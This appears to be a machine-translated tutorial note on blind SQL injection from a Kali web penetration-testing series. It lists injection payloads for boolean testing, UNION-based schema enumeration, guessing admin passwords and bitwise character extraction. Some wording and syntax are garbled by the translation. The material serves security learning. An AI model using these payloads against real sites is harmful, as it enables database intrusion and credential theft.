Small white diary 42:kali Penetration Testing Web infiltration-sql Blind Note

SQL Blinds

"Introduction to SQL Injection"

SQL Blinds: do not display database built in error messages "built-in error information to help developers find and fix problems", but because the error message provides a lot of information about the system. When the programmer hides the error message in the database and replaces it with the common bug,SQL injection will not be able to judge the result of the injected statement according to the information of the errors, that is, the blind note .

Idea: Since can not be based on error information to judge the results, based on the different results of logic and authenticity to judge

A. 1 ' and 1=1--+

B. 1 ' and 1=2--+ "true after false before input, no return, page not executed "

# # # A vs. b indicatesa SQL injection vulnerability exists

Common Blind Statement "principle: guessing Data"

1 ' ORDER by 5-- ' to test the number of columns by modifying the values , the vulnerability does not exist if the page does not appear (1 cannot be removed because the SQL statement indicates that a correct value must be submitted, not necessarily 1) "

2 ' Union Select User (), database ()-- "query username and database name"

2 ' Union Select 1,2--+

1 ' Union Select NULL,CONCAT_WS (CHAR (32,58,32), User (), database (), version ())--+

"Check all the table names, #为注释后面的代码"

1 ' and 1=0 Union select Null,table_name from information_schema.tables#

1 ' and 1=0 Union select Null,table_name from Information_schema.columns where table_name= ' users ' #

when not authorized to read INFORMATION_SCHEMA Library/Reject Union, ORDER BY statement

#若为真, the display content, if False, does not show anything "1 in the statement is not fixed, can be flexibly changed, even characters, depending on the circumstances."

#使用Burpsuite自动化猜解内容

1, guess the name of the column

1 ' and user is [not] null--+ "test whether the user column is empty"

2. Guess the name of the current table table

1 ' and users. User is not null--+ ' column as known

3, guess the other tables in the library

1 ' and (select COUNT (*) from table) >0--+

4. List corresponding relation

1 ' and users. use R isn't null--+

　5. Guess the contents of the field

1 ' and user= 'admin

1 ' or user like '%a%

6, guess the account corresponding password

2' or user= ' admin ' and password= 'faqfoiauggvuagbymd5' "If 1, is id=1, if 2, then ID 2, (meaning to query the second account)"

Brain Cave case

When encountering a webpage that does not display any information extracted from the database, only the conversion of the page style screen

and 1=1--+ "original page"

and 1=2--+ "show Another Page"

#则存在SQL注入漏洞

Construct statements

1 ' and ORD (MID ((VERSION ()), +)) &1>0--+ "No return, then the ASCII code of the bit is 0, returns normally, then the ASCII code is 1"

Such as:

#则证明, in binary, the decimal number is 32, the binary is 1

"Mid Function: intercepts a string of a satin string, ( syntax: MID (columnname,start,length) Start position, length )"

"Ord function:#把函数中的字符转换成ASCII码, ( Syntax: ORD (String) &n ) {n is the corresponding position of binary ASCII is 0 or 1,n=1,2,4,8,16,32,64,128} Iterate through 8 times to query the value of each ASCII code, reverse the character "Ling use Query version (), DATABASE (), Current_User () the current user and other functions"

Code audits

Low-level "No sterilization of variables"

Medium security level

High Security level

Small white diary 42:kali penetration test Web penetration-sql blind